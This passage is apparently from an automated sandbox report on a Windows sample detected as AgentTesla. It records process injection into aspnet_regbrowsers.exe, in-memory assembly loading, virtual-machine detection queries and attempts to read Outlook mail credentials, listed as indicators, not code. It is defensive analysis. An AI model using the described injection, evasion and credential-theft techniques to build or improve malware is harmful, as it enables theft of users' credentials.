                      Source: W7UbgU8x18.exe, 00000000.00000002.302293725.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamefixedhost.dll0 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeVirustotal: Detection: 35%
                      Source: W7UbgU8x18.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile read: C:\Users\user\Desktop\W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\W7UbgU8x18.exe "C:\Users\user\Desktop\W7UbgU8x18.exe"
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmp
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@1/2
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1768:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: W7UbgU8x18.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb source: W7UbgU8x18.exe
                      Source: Binary string: fixedhost.pdbMZ@ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Z.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb* source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb4 source: WER343.tmp.dmp.10.dr
                      Source: Binary string: mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Windows\tuneraidfix.pdbpdbfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdbP source: W7UbgU8x18.exe, 00000000.00000000.256076792.0000000000C18000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.302604429.0000000000C18000.00000004.00000020.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\user\Desktop\W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbW source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER343.tmp.dmp.10.dr
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: lC:\Users\user\Desktop\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb:8 source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: W7UbgU8x18.exe, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.1.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.5.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Code function: 0_2_0272B7B2 push ds; retf 0_2_0272B7B6
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Code function: 0_2_0272545A push ds; retf 0_2_0272545E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_064635A8 push es; iretd 2_2_06463D3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464245 push es; iretd 2_2_06464248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464241 push es; iretd 2_2_06464244
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646424D push es; iretd 2_2_06464250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464249 push es; iretd 2_2_0646424C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464255 push es; iretd 2_2_06464258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464251 push es; iretd 2_2_06464254
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646425D push es; iretd 2_2_06464260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464259 push es; iretd 2_2_0646425C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464265 push es; iretd 2_2_06464268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464261 push es; iretd 2_2_06464264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646426D push es; iretd 2_2_06464270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464269 push es; iretd 2_2_0646426C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464275 push es; iretd 2_2_06464278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464271 push es; iretd 2_2_06464274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646427D push es; iretd 2_2_06464280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464279 push es; iretd 2_2_0646427C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464205 push es; iretd 2_2_06464208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464201 push es; iretd 2_2_06464204
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646420D push es; iretd 2_2_06464210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464209 push es; iretd 2_2_0646420C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464215 push es; iretd 2_2_06464218
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464211 push es; iretd 2_2_06464214
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646421D push es; iretd 2_2_06464220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464219 push es; iretd 2_2_0646421C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464225 push es; iretd 2_2_06464228
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464221 push es; iretd 2_2_06464224
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646422D push es; iretd 2_2_06464230
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464229 push es; iretd 2_2_0646422C
                      Source: W7UbgU8x18.exe Static PE information: 0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6940 Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944 Thread sleep count: 2557 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 6944 Thread sleep count: 7299 > 30
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Window / User API: threadDelayed 2557
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Window / User API: threadDelayed 7299
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_016BCB20 LdrInitializeThunk,2_2_016BCB20
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 438000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: FD0008
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
                      Source: W7UbgU8x18.exe, 00000000.00000000.261554624.0000000001200000.00000002.00020000.sdmp, W7UbgU8x18.exe, 00000000.00000000.256145206.0000000001200000.00000002.00020000.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.517926285.0000000001C30000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Queries volume information: C:\Users\user\Desktop\W7UbgU8x18.exe VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.10.dr Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match File source: Process Memory Space: W7UbgU8x18.exe PID: 5644, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: aspnet_regbrowsers.exe PID: 408, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)
